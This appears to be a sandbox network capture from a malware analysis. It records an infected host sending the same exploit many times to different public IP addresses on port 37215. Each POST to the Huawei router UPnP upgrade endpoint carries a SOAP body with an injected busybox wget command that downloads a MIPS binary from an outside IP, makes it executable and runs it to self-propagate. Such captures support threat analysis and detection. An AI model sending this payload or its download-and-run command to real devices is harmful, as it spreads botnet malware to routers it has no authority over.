                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1106192.168.2.1342278157.115.77.24937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505371094 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1107192.168.2.1347324157.152.23.21737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505397081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1108192.168.2.1344096166.69.147.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505422115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1109192.168.2.1356608157.7.158.12937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505446911 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1110192.168.2.1359904157.175.50.23637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505702972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1111192.168.2.1356002157.236.156.16237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.505736113 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1112192.168.2.1333578157.110.37.14337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506103992 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1113192.168.2.136031241.176.120.9937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506113052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1114192.168.2.135872841.240.36.8237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506140947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1115192.168.2.133867424.90.181.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:18.506169081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
